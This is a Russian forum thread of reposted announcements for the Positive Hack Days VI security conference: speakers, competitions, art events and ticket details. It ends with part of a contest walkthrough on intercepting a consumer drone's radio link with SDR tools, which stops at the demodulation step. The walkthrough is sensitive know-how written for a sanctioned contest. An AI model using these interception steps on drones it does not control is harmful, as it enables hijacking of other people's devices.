1. На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Скрыть объявление
Привет, Незнакомец! У тебя есть возможность Оставить комментарий в теме

Hack & IT conf PHDays VI

Тема в разделе "EV3NTS", создана пользователем ddd, 12 фев 2016.

  1. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Шестой международный форум по практической безопасности Positive Hack Days состоится 17 и 18 мая 2016 года в московском Центре международной торговли (Москва, Краснопресненская набережная, дом 12.).

    Чуть не пропустил халяву.
    Видео о PHDays V


    Тема о прошлом мероприятии: http://webcriminal.ru/threads/positive-hack-days-v.17138/

    P.S. я в этому году поеду.
     
    X-Oleg нравится это.
  2. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    31 января закончилась первая волна приема заявок на участие в шестом международном форуме по практической безопасности Positive Hack Days, который состоится в Москве 17 и 18 мая 2016 года в Центре международной торговли. Желающие выступить на форуме, но не успевшие подать заявку, смогут сделать это в ближайшее время: вторая волна Call for Papers стартует уже 17 февраля и продлится до 31 марта!

    А пока мы анонсируем первую группу участников, вошедших в основную техническую программу. В этом году слушатели PHDays узнают, как сорвать большой куш в Microsoft, как с помощью смартфона тестировать безопасность транспортных систем, и выяснят всю подноготную рынка уязвимостей нулевого дня.

    Ловушка для хакеров

    Впервые на PHDays выступит признанный эксперт по подавлению, предотвращению и ликвидации последствий DDoS-атак Терренс Гаро (Terrence Gareau). Он расскажет, как создать honeypot (ловушку) и организовать сервис с обновляемыми данными о попавшихся DDoS-ботах с помощью Kibana, Elasticsearch, Logstash и AMQP. Терренс Гаро последние два года вместе с командой работал над системой мониторинга и сбора внешней статистики DDoS-атак, и посетители форума смогут ознакомиться с ее исходным кодом.

    Охотники за наградой, или Кто есть кто на рынке эксплойтов

    Участник пятого PHDays, основатель проекта BeeWise и главный консультант компании secYOUre Альфонсо де Грeгорио (Alfonso de Gregorio) вновь выступит с докладом на международном форуме по практической безопасности. Он продолжит начатую в прошлом году тему продажи эксплойтов. На этот раз Альфонсо подробнее расскажет об участниках рынка эксплойтов и о деятельности брокера уязвимостей нулевого дня и раскроет некоторые аспекты деловой этики.

    Как сделать вечный билет на метро

    Доклад итальянского исследователя Маттео Беккаро (Matteo Beccaro) посвящен общим вопросам транспортной безопасности, мошенничества и технологических сбоев. Маттео Беккаро рассмотрит несколько серьезных уязвимостей в реальных транспортных системах, в которых используется технология NFC. Ключевой момент выступления — демонстрация открытого приложения для тестирования транспортных систем со смартфона. Доклад будет интересен как профессиональным пентестерам, так и любителям.

    Защита веб-приложений с помощью JavaScript

    Внедрение клиентских сценариев JavaScript может быть использовано для обнаружения и предотвращения различных атак, поиска уязвимых клиентских компонент, определения утечек данных об инфраструктуре веб-приложений, выявления веб-ботов и инструментальных средств нападения. Ведущие эксперты Positive Technologies Денис Колегов и Арсений Реутов продемонстрируют, как защищать веб-приложения с использованием JavaScript, а также поделятся собственными методами обнаружения инъекций без использования сигнатур и фильтраций по регулярным выражениям. Еще один вопрос, который рассмотрят эксперты, — концепция JavaScript-ловушек на стороне клиента для атак SSRF, IDOR, Command Injection и CSRF.

    Как сорвать куш в Microsoft

    Еще несколько лет назад американский софтверный гигант Microsoft отказывался принимать участие в программе Bug Bounty, несмотря на то что для конкурентов корпорации вознаграждения за уязвимости давно стали обычной практикой. В последние годы Microsoft стал выплачивать вознаграждение за сообщения о некоторых типах уязвимостей — от 100 до 100 000 долл. На регулярной основе публикуется топ-100 исследователей — участников программы.

    Джейсон Шерк (Jason Shirk) — главный стратег службы безопасности Microsoft Security Response Center поведает слушателям о видах вознаграждений и о том, как MSRC работает с исследователями, а также раскроет секреты крупных наград.

    Полный список выступлений будет опубликован в апреле на официальном сайте PHDays VI. Для того чтобы бесплатно принять участие в форуме, можно выступить с исследованием в области ИБ, стать участником одного из хакерских конкурсов или написать самый лучший киберпанковский рассказ. Еще один способ попасть на PHDays VI — это купить билет. Напоминаем, что с 15 февраля билет на два дня форума стоит 9600 рублей, на один день — 7337 рублей. С 1 марта цены повысятся до 14 400 и 9600 рублей соответственно.


    Источник: phdays.ru
     
    X-Oleg нравится это.
  3. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Может кто из пользователей форума захочет на халяву пробиться :)


    Конкурс молодых ученых в рамках ежегодного форума Positive Hack Days стал хорошей традицией. Подумать только, уже в пятый раз Young School дает начинающим безопасникам возможность представить результаты своих исследований перед ведущими экспертами со всего мира!.. Однако на этот раз мы решили изменить формат Young School: теперь это не конкурс, а секция.

    Мы рады объявить о приеме заявок. Приглашаем студентов, аспирантов и независимых молодых ученых, ведущих исследования по различным направлениям ИБ.

    Тематика интересующих нас исследований осталась неизменной — практическая безопасность:

    • Новые цели хакерских атак. Internet of things: ботнеты из утюгов, умные браслеты и удаленное управление автомобилями.
    • Компьютерная криминалистика против целевых APT и кибершпионажа.
    • Атаки на платежные системы и ДБО, безопасность payWave, PayPass и Apple Pay.
    • Работа SOC: кейсы, методы, инструменты.
    • Методы борьбы с DDoS-атаками.
    • Безопасность ERP-систем, бизнес-приложений. Противодействие атакам на веб-приложения.
    • Новые векторы и техники атак на мобильные устройства.
    • Защита облачных сред, корпоративных и частных. Безопасность государственных информационных систем и электронного правительства.
    • Прикладная криптография.
    • Методы и средства обеспечения физической безопасности.
    • Защита АСУ ТП (SCADA). Безопасность промышленных систем и современного города.
    • Уязвимости нулевого дня и новые способы доставки эксплойтов.
    • Небезопасная безопасная разработка. SSDL и уязвимости в ИБ-продуктах.
    Важное условие: практическая ценность предлагаемых решений должна быть подтверждена экспериментально, а также обоснована с точки зрения новизны и актуальности. Мы не принимаем работы, в которых изложены только идеи (пусть даже гениальные), не подкрепленные конкретными результатами.

    Авторы лучших исследований получат возможность выступить перед хакерами и специалистами по безопасности на международном форуме Positive Hack Days VI, который пройдет в Москве 17 и 18 мая. Для каждой работы, прошедшей отбор, организаторы возместят одному из авторов расходы на дорогу и проживание, а соавторы получат билеты на форум.

    Заявка
    В этом году, в отличие от прошлого, заявка на секцию представляет собой тезисы произвольного формата, на русском или английском языках. Главное требование: рецензенты должны иметь возможность оценить исследование в полном объеме (подробнее см. правила оформления). Рецензентами выступают эксперты из академической среды, имеющие опыт работы в практической безопасности.

    Кстати, теперь у участников есть возможность проконсультироваться с организаторами перед подачей заявки. По всем вопросам можно написать Андрею Петухову — youngschool@phdays.com.

    Напомним, что впервые PHDays Young School прошел в 2012 году, в финале встретились представители учебных заведений Красноярска, Москвы, Новосибирска, Санкт-Петербурга и Таганрога. Со временем конкурс вышел на международный уровень: в прошлом году финалистами стали молодые ученые из Германии, России, Румынии и США.

    Не упустите свой шанс принять участие в Positive Hack Days VI! Заявки принимаются по адресу youngschool@phdays.com до 1 апреля 2016 года.
     
  4. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Хакеры и художники — казалось бы, что может быть общего между ними, ведь это совершенно разные миры? Однако и те и другие не понаслышке знают, что такое вдохновение и творческий процесс. Мы решили повторить прошлогодний опыт и собираем на площадке международного форума по практической безопасности Positive Hack Days VI хакеров, художников и всех творческих людей. Рассказываем, что будет за кулисами технической программы.

    Для посетителей и участников PHDays пройдет выставка иллюстраций Алексея Андреева — художника из Санкт-Петербурга. Его работы, выполненные в технике digital painting, очень полюбились посетителям прошлогоднего форума. Художник вновь приглашает всех отправиться в путешествие в фантастический мир: привычные глазу объекты и явления предстают в новом свете, и кажется, что все происходящее — правда, что это и есть самая настоящая жизнь. Фантазийные сюжеты, обаятельные герои и невероятное правдоподобие — вот, пожалуй, три главные составляющие картин Андреева.

    На этот раз художник приготовил сюрприз — серию картин с дополненной реальностью. Посетители выставки смогут «оживить» картины с помощью смартфона. Для этого нужно будет скачать специальное приложение и просканировать QR-код понравившейся картины. Всего несколько секунд, и вы уже в мире летающих электричек и постапокалиптических монстров. У каждого будет возможность пообщаться с художником и приобрести его картины.

    Как и раньше, будет работать игровая зона. Советские игровые автоматы, классика олдскула — «Магистраль», «Морской бой», «Авторалли-М». А также полюбившиеся всем в 90-х годах Sega, Dendy и PlayStation. Подзарядиться энергией перед многочасовыми виртуальными боями или перед новой порцией докладов можно будет в автомате с космической едой. Да-да, той самой, в тюбике, которой питаются космонавты на орбите. Организаторы форума подготовили еще несколько сюрпризов. Например, пообщаться за кулисами можно будет не только с коллегами, но и с самым настоящим роботом. Он ответит на любой вопрос — если, конечно, собеседник ему понравится :)

    Любители высокого искусства встретятся с удивительными арт-объектами. Летопись PHDays на панно из дискет, хакерский манифест на большом экране, оптические инсталляции, рассмотреть которые можно только со строго определенного расстояния... Обмануть зрение и в прямом смысле слова услышать, как работает мозг, — все это и многое другое можно будет на PHDays VI.

    Не останется в стороне и литература. В этом году снова пройдут чтения, в рамках конкурса киберпанковских рассказов «Взломанное будущее». Рассказы, вышедшие в финал, зачитают бессменные участники форума, создатели культовой радиопередачи «Модель для сборки». Они создадут подходящую атмосферу: чтение пройдет в сопровождении современной электронной музыки. Кстати, у каждого из вас еще есть возможность стать участником конкурса: рассказы принимаются до 15 апреля 2016 года по адресу cyberpunk@ptsecurity.com.

    Напомним, что PHDays VI уже не за горами — он состоится 17 и 18 мая 2016 года в Центре международной торговли в Москве. На форуме соберутся со всего мира специалисты по безопасности и хакеры, представители госструктур, бизнесмены, молодые ученые и журналисты. Не упустите шанс принять участие! Купить билеты можно на странице runet-id.com/event/phdays16. Чтобы бесплатно участвовать в форуме, вы можете выступить с исследованием в области ИБ (вторая волна Call for Papers продлится до 31 марта), стать участником одного из хакерских конкурсов (регистрация и отборочные соревнования откроются ближе к маю) или выйти в финал конкурса рассказов.
     
  5. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Конкурс CityF: битва между хакерами и безопасниками

    Через два месяца состоится шестой форум Positive Hack Days. Уже во всю идет подготовка к мероприятию: объявлена первая группа докладчиков и близится к концу вторая волна Call For Papers, стартовал прием заявок на Young School и конкурс киберпанковских рассказов «Взломанное будущее». Теперь мы рады сообщить, что опубликованы правила соревнования PHDays VI СityF: Противостояние.

    PHDays VI СityF: Противостояние

    Центральная тема шестого PHDays — противостояние. На этот раз вместо привычных соревнований CTF, мы устраиваем настоящие военные действия. События на площадке будут максимально приближены к реальности: на полигоне PHDays VI СityF развернется масштабная эмуляция городской инфраструктуры. «Хакеры» смогут атаковать город всеми доступными способами, а против них будут команды «защитников» и экспертные центры безопасности — Security Operations Center (SOC).

    Инфраструктура

    Полигон представляет собой единый город, в котором работают и взаимодействуют между собой банк, телеком-оператор, электроэнергетическая компания (распределительная и магистральная подстанции, гидроэлектростанция, центральный и региональный диспетчерские пункты), офис крупного холдинга и даже «умный» дом. Также полигон содержит в себе эмуляцию сети Интернет с новостными и развлекательными сайтами и соцсетями, которые можно использовать для проведения атак. Отметим, что полигон не статичен и постоянно меняется, в него добавляются новые сервисы, удаляются старые. С ними постоянно взаимодействуют настоящие пользователи.

    В начале соревнования команды получат доступ к игровой инфраструктуре, включающей форум BlackMarket. Здесь хакеры смогут продавать добытую в результате взлома информацию, а также получать новые задания.

    Правила

    В CTF принимают участие множество команд, приглашенных организаторами на роли атакующих, защитников и SOC. Команды могут делать абсолютно все, что не запрещено правилами. За игрой будет непрерывно следить жюри. Командам запрещается:

    • атаковать инфраструктуру полигона,
    • проводить атаки на компьютеры жюри,
    • генерировать неоправданно большой объем трафика (флудить),
    • а «защитникам», кроме того, запрещается блокировать доступ к ресурсам по IP-адресу.
    За нарушение правил команда может быть оштрафована или дисквалифицирована. Жюри может уточнить правила в любой момент до начала игры — и менять состояние игровой инфраструктуры во время нее.

    За успешные действия командам будут присуждаться награды в различных номинациях. Отметим, что призы смогут получить не только участники CityF, но и интернет-пользователи в рамках PHDays Everywhere, а также те, кто примет участие только в отдельных заданиях (например, во взломе банка или АСУ ТП). Специальные призы получат команды, которые выступят перед публикой с отчетами о проделанной работе.

    «Хакеры»

    Атаковать город можно будет с площадки PHDays или удаленно, в составе команды или в одиночку. Для удаленной работы «хакеров» предусмотрено подключение по VPN. «Хакеры» не должны нарушать логику построения полигона, разрешается атаковать только определенные объекты. Кроме того, у «хакеров» есть возможность сделать публичное заявление об успешно реализованной атаке.

    «Защитники»

    В качестве «защитников» могут выступать как сформированные корпоративные команды, так и отдельные специалисты (можно под псевдонимом). У «защитников» будет несколько профильных команд, каждая из которых обеспечит безопасность одного объекта на полигоне — банка, оператора и т. д. У каждой команды будет достаточно времени для настройки средств защиты. В процессе Противостояния «защитники» смогут менять конфигурации средств защиты: каждый сам хозяин своей инфраструктуры. Для обороны объектов можно использовать любые ИБ-средства, в задачи команд входит проектирование, установка, настройка и эксплуатация средств защиты (в случае необходимости можно запросить их у организаторов). Помогать «защитникам» будет команда SOC.

    В ходе игры «защитники» должны периодически выступать с отчетами о произошедших инцидентах и проделанной работе по противодействию атакам.

    «Внешние SOC»

    Каждый SOC выбирает себе несколько объектов (телеком-оператор, банк и т. п.) и обеспечивает их безопасность совместно с командами «защитников». SOC осуществляет мониторинг, помогает «защитникам» обнаруживать атаки. Во время Противостояния SOC должен оперативно оповещать защищающихся об атаках и предлагать меры защиты. Также как и «защитники», команды SOC должны регулярно выступать с отчетами о своей деятельности, представлять статистику защищенности полигона (тренды по атакам и другие метрики).

    Главный конкурс PHDays сменил формат: мы отошли от привычного CTF — на форуме развернется настоящая битва хакеров и безопасников. В этот раз сражаться будут три команды: «хакеры», «защитники» и SOC (security operations centers). События на полигоне будут максимально приближены к реальности. В распоряжении команд — эмуляция города, в котором есть банк, телеком-оператор, офис крупного холдинга, электроэнергетическая компания и другие объекты. Помимо команд на полигоне будет множество пользователей и клиентов. Во время игры команды для достижения цели смогут действовать любыми способами, которые не запрещены правилами.

    Если вы хотите стать участником этой масштабной битвы — пишете по адресу phd@ptsecurity.com. Кстати, в CTF могут принять участие гости PHDays и интернет-пользователи в рамках PHDays Everywhere, а также те, кто решил попробовать себя в определенных заданиях (например, во взломе банка или АСУ ТП).

    Заявки принимаются до 10 апреля 2016 года. Количество мест ограничено!


    P.S. не знаю как вы, а я на эту битву заявку подам :)
     
  6. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
     
  7. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Для "халявщиков" :)

     
  8. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Новые конкурсы на PHDays VI: ломаем ГЭС и «умный» дом
     
  9. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    В начале апреля о Мокси Марлинспайке написали все крупнейшие издания мира. Миллиард пользователей WhatsApp получили обязательное сквозное шифрование трафика на основе алгоритмов его мессенджера Signal. Через месяц, 17 и 18 мая, с Мокси можно будет познакомиться на форуме PHDays VI. На мероприятии выступит не только он, но и Рахул Саси, Пол Викси, Андрей Масалович, Джон Бамбенек.

    Обама и Кэмерон против Марлинспайка
    [​IMG]

    При рождении в 1980 году Мокси получил имя Мэтью Розенфельд. В конце 90-х он переехал в Сан-Франциско. Море и хакинг — две основные страсти человека, который выбрал себе псевдоним Мокси Марлинспайк. Marlinspike означает такелажную свайку для пробивки прядей троса, а Moxie — смелость.

    Личный сайт Марлинспайка не случайно называется оруэлловским термином thoughtcrime.org («мыслепреступление»). После разработки в 2009 году онлайн-сервиса WPA Cracker и MitM-атаки SSL stripping спецслужбы стали оказывать Мокси повышенное внимание. В аэропортах он стал объектом особо пристального «дополнительного досмотра». Чуть позже номер его мобильного нашли в контактах Якова Аппельбаума, активиста WikiLeaks, и давление на Мокси усилилось. Однажды Мокси продержали несколько часов в аэропорту, конфисковав все устройства.

    Спецслужбы, кажется, напрасно разозлили Марлинспайка. В 2010 году он вместе с Стюартом Андерсоном создал компанию Whisper Systems. Продукты новой фирмы — защищенная система обмена сообщениями TextSecure и программа шифрования звонков RedPhone — заслужили высокие оценки специалистов. Утилиты были бесплатны, в отличие от большинства аналогов, и качественно работали. Но в 2011 году компанию продали в Twitter и разработка заглохла. Туда же на должность главы отдела информационной безопасности ушел Марлинспайк.

    Покинув Twitter через полтора года, Марлинспайк реанимировал свое детище, организовав некоммерческую организацию Open Whisper Systems и продолжив разработку TextSecure и RedPhone. К счастью, в Twitter не стали вставлять палки в колеса и разрешили сделать приложения общедоступными.

    Сегодня оба продукта заменены мессенджером Signal, выпущенным на платформах iOS и Android. Signal рекомендован не только Эдвардом Сноуденом, но и правозащитной организацией Фонд электронных рубежей (Electronic Frontier Foundation). В рейтинге EFF он набрал семь баллов из семи, что делает его одним из наиболее безопасных. Для сравнения, у Skype в этой таблице один балл, у Viber два, у обычных чатов Telegram — четыре, у «секретных чатов» — семь.

    [​IMG]

    В декабре 2016 года Павел Дуров, отвечая на критику Сноудена и Марлинспайка по поводу незащищенности стандартной переписки в Telegram, заявлял, что среднестатистический пользователь его мессенджера предпочитает синхронизацию шифрованию. У «секретных чатов» ключ шифрования находится на устройстве, а не на удаленном сервере, поэтому они не могут синхронизироваться через облако.

    До ноября 2014 года у WhatsApp в рейтинге EEF было два балла из семи, а после начала сотрудничества с Open Whisper Systems стало шесть баллов из семи. Радовались не все. Барак Обама назвал это «проблемой», а премьер-министр Великобритании Дэвид Кэмерон пообещал запретить WhatsApp в случае победы на выборах. С 5 апреля 2016 года сквозное шифрование работает у всех пользователей WhatsApp. Теперь владельцы мессенджера даже при желании ничего не могут выдать спецслужбам. Ни видео, ни голосовой трафик, ни переписку, ни фотографии.

    Когда молодежь спрашивает Мокси о первых шагах в карьере разработчика ПО, он советует им не торопиться. «Мой друг, — писал Мокси в 2011 году на Slashdot, — недавно пошутил: большинство программистов узнали о технологиях прежде, чем узнали себя. Если вы молоды, потратьте год вашей жизни на эксперимент, в котором значительная часть вашей жизни будет сосредоточена на открытиях, а не на заработке. Возьмите с друзьями музыкальные инструменты, выучите три аккорда и отправьтесь на гастроли. Найдите заброшенную лодку и пересеките океан. Отправляйтесь автостопом на Аляску. Постройте флот дирижаблей или беспилотник».

    Рахул Саси: искусственный интеллект от угонщика дронов
    [​IMG]

    Беспилотники любит другой участник PHDays VI — Рахул Саси (Rahul Sasi). В фильме «Интерстеллар» главный герой со своей дочерью перехватывает управление БПЛА; вот примерно то же самое делает и Рахул. В 2015 году он разработал бэкдор Maldrone для угона квадрокоптеров Parrot AR.Drone 2.0 и DJI Phantom. Работая в связке с эксплойтом Skyjack, вирус Maldrone позволяет угонять сами дроны, перехватывать видеосигнал с захваченных устройств и даже создавать летающую армию заражая соседние дроны. К концу 2016 года число только американских беспилотников достигнет 2,5 миллионов, что заставляет внимательно присмотреться к исследованиям Рахула.


    На PHDays VI Рахул Саси расскажет о другом своем проекте — создании автоматизированной системы безопасности, основанной на искусственном интеллекте. Большинство традиционных сканеров безопасности веб-приложений не способны обнаружить логические ошибки безопасности. Докладчик продемонстрирует, как создать инструмент для выявления таких ошибок на основе технологий машинного обучения. С некоторыми подробностями проекта можно ознакомиться в статье, вышедшей в газете The Register.

    Джон Бамбенек: как найти преступника № 1

    [​IMG]

    Черные шляпы бьют не только по сильным и богатым. В анонсе своего выступления на BlackHat Джон Бамбенек (John Bambenek) описывал трагедию, которая произошла в марте 2014 года в Румынии. Программа-вымогатель до такой степени деморализовала пользователя, что он убил себя и своего 4-летнего сына. Мужчина, подхвативший «полицейский» вирус на сайте для взрослых, принял за чистую монету сообщение, что его ждет огромный штраф или тюремное заключение на 11 лет.

    В интервью The News Gazette Бамбенек рассказывал, что своим главным профессиональным достижением считывает участие в операции Tovar. В июне 2014 года 150 специалистов из 13 стран смогли обнаружить организатора одной из самых опасных хакерских группировок в истории — Евгения Богачева. Уроженец Анапы, известный под псевдонимами lucky12345 и slavik, похитил около 100 млн долларов у граждан и компаний США. Ему также приписывают разработку вымогательского ПО CryptoLocker и создание ботнета GameOver Zeus. «Богачев и его команда совершили киберпреступления, которые невозможно представить даже в научно-фантастическом кино», — заявлял прокурор, участвующий в расследовании дела. В 2016 году ФБР включила Богачева в список наиболее разыскиваемых киберпреступников, причем за россиянина назначено самое большое вознаграждение (3 млн долларов).

    39-летний Бамбенек начал писать компьютерные программы в возрасте 6 лет. Первые свои хакерские исследования он провел еще до поступления в колледж. Учебу оплатили военно-воздушные силы США, где Джон планировал продолжить карьеру после получения степени в области астрофизики. Однако травма колена, полученная в альпинистском походе, поставила крест на карьере в ВВС. Первым крупным местом работы для Джона стала компания Ernst & Young, где он стал менеджером проекта (и, возможно, ходил в одну столовую с создателем WhatsApp Яном Кумом, работавшим после университета в отделе информационной безопасности Ernst & Young).

    Помимо охоты на киберпреступников Бамбенек помогает школьникам в Танзании силами организованного им благотворительного фонда, любит стейки и воспитывает четверых детей.

    Москва очень понравилась Джону. Посещение города в 2015 году (куда он приезжал на PHDays) он сравнил со взрывом. Надеемся, что участие в форуме 2016 года станет для Бамбенека еще одним незабываемым приключением. Джон расскажет, как можно выявлять злоумышленников, используя особенности преступной сетевой инфраструктуры, которую они создают. С советами Бамбенека по защите от вирусов-вымогателей можно ознакомиться на сайте SANS Technology Institute.

    Пол Викси: DNS как линия защиты

    [​IMG]

    В Москву приедет также Пол Викси (Paul Vixie) — основатель Internet Systems Consortium. За новаторские достижения в 2014 году он был включен в Зал славы интернета. В этом списке всего лишь несколько десятков фамилий!

    С 1980 года Викси занимается разработкой интернет-протоколов и архитектурой ПО для систем UNIX. Создал программу Cron (для BSD и Linux), считается главным автором и техническим архитектором DNS-сервера BIND 4.9 и BIND 8. Является автором и соавтором около десятка документов RFC, в основном по DNS и аналогичным темам. Получил степень доктора наук в Университете Кэйо за работу, связанную с DNS и DNSSEC.

    В своем докладе Викси покажет, как обезопасить DNS и использовать ее для защиты других объектов локальной или глобальной сети. Он расскажет о подмене кэша DNS, расширениях защиты для протокола DNS (DNSSEC), DDoS-атаках, ограничении скорости передачи, межсетевом экране DNS и пассивном DNS-мониторинге.

    Андрей Масалович: поиск авианосца в Google

    [​IMG]

    Выступления подполковника ФАПСИ в отставке Андрея Масаловича мало похожи на типичные доклады по информационной безопасности. Это яркие шоу, на них можно наблюдать за эксплуатацией уязвимостей на сайте Пентагона или за судьбой секретного китайского авианосца. «Я не олимпийский чемпион и даже не мастер — я, скажем так, перворазрядник», — говорил он в интервью Forbes. Но истории Масаловича настолько увлекательны, что слушатели нередко просят продлить его выступление (как это было на PHDays V).

    [​IMG]

    В 2014 году мастер-класс Масаловича «Жизнь после Сноудена» занял второе место по цитируемости в соцсетях среди нескольких десятков докладов PHDays VI. Особым вниманием пользовались слайды с разделом «Документы» ВКонтакте, где любой желающий может обнаружить сканы чужих документов.

    [​IMG]

    Изучение тендерных документов Пентагона прямо во время мастер-класса PHDays не осталось без внимания американских спецслужб. Лауреата стипендии РАН «Выдающийся ученый России» включили в базу ЦРУ как руководителя группы хакеров под кличкой Леший.

    [​IMG]

    В последние два года основная тема выступлений Андрея Масаловича — выявление и предупреждение вредного информационного воздействия. Его доклад «Выживший» входит в пятерку наиболее ожидаемых выступлений в программе PHDays VI. Андрей расскажет о том, как подготавливаются информационные атаки, как распознавать их на ранних стадиях и противостоять им. Проанализирует особенности восприятия и распространения информации в социальных сетях с использованием троллей и ботов. Рассмотрит метод экспресс-анализа социальных портретов участников массовых обсуждений — рядовых пользователей, политиков, медийных персон, подростков, вербовщиков и их жертв.

    17 и 18 мая Мокси Марлинспайк, Рахул Саси, Пол Викси, Андрей Масалович, Джон Бамбенек и десятки других экспертов по информационной безопасности выступят на форуме Positive Hack Days VI в Москве. На сайте phdays.ru можно ознакомиться с предварительной программой мероприятия и выбрать лучший способ попасть на мероприятие.
     
  10. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
     
  11. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Про меня походу... :websmiles_47:
     
  12. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    До окончания продажи билетов остался один день (13 мая).

     
  13. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Печаль, засунули в маленький "А" зал интересные темы,.. а в него не пробиться,.. а если и пробиться, то там очень душно как в парилке... Не зачёт за такое.
     
  14. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
  15. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Пока сам еще не созрел на написание отчёта об поездке, выложу обзор от организаторов:
     
  16. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Пока не нашел времени описать свою поездку, выложу статью про конкурс на PHDays VI

    В этом году на PHDays был представлен новый конкурс, где любой желающий мог перехватить управление квадрокоптером Syma X5C. Производители часто полагают, что если они используют не IP-технологии, а какой-нибудь другой беспроводной стандарт, то можно не думать о защищенности. Как будто хакеры махнут рукой, решив, что разбираться с чем-то, кроме IP, — это слишком долго, сложно и дорого.

    Но на самом деле, как мы уже много раз упоминали, SDR (software-defined radio) — отличный инструмент для доступа в мир IoT, где уровень вхождения определяется уровнем добросовестности производителя IoT-решений. Однако даже не имея SDR можно творить чудеса, пусть и в ограниченном пространстве частот и протоколов.

    Цель — перехватить управление дроном.

    Входные данные:

    • диапазон управления дроном: 2,4 ГГц ISM,
    • управление осуществляется модулем nRF24L01+ (на самом деле — его клоном BK2423).
    Средства (выдавались желающим): Arduino Nano, nRF24L01+.
    Результат — угонщик получил Syma X8C в подарок.

    Так как среди желающих угнать наш дрон оказались уже подготовленные люди, имеющие в арсенале HackRF, BladeRF и другие серьезные игрушки, мы опишем два метода — SDR и непосредственно nRF24L01+.
    Путь самурая — SDR
    Первым делом необходимо найти каналы, на которых работает данный пульт. Но перед этим стоит пробежаться по даташиту, чтобы понять, что вообще искать. Первое, что нам необходимо, это организация частот.

    [​IMG]

    Теперь мы знаем, что всего имеется 126 каналов с шагом в 1 МГц. Еще полезно было бы узнать ширину канала и битрейт, на будущее.

    [​IMG]

    Вообще можно все сделать и без этих знаний, ведь далеко не всегда известно, из чего состоит передатчик. Итак, запускаем сканер спектра. Мы используем UmTRX и максимально возможный для него bandwidth — 13 МГц.

    [​IMG]

    [​IMG]

    [​IMG]

    Мы не стали приводить скриншоты всего спектра, но как найти подобные данные в радиоэфире — должно быть понятно. Можем увидеть, что с определенной периодичностью данные появляются на 25, 41, 57 и 73 каналах.

    Несмотря на то, что даташит однозначно указывает модуляцию, в жизни у нас не всегда есть даташит к перехватываемому девайсу. Поэтому собираем простейшую схему в GNU Radio и записываем любой из найденных каналов.

    [​IMG]

    Похоже, что bandwidth <= 800 КГц; согласно даташиту, это значит, что битрейт — 250 Кбит/с.

    Теперь мы хотим посмотреть на записанные данные; запускаем baudline, в котором открываем записанный файл с правильными параметрами, — и видим нечто подобное:

    [​IMG]

    Выбираем один из подсвеченных пиков и открываем окно waveform.

    [​IMG]

    Вверху видим записанный сигнал; похоже, мы все сделали правильно, по переходам фазы становится очевидно, что это FSK/GFSK-модуляция.

    Далее нам необходимо поставить демодулятор и немного отфильтровать лишнее.

    [​IMG]

    Открываем результат, картина выглядит иначе, теперь находим темную полосу и открываем waveform.

    [​IMG]

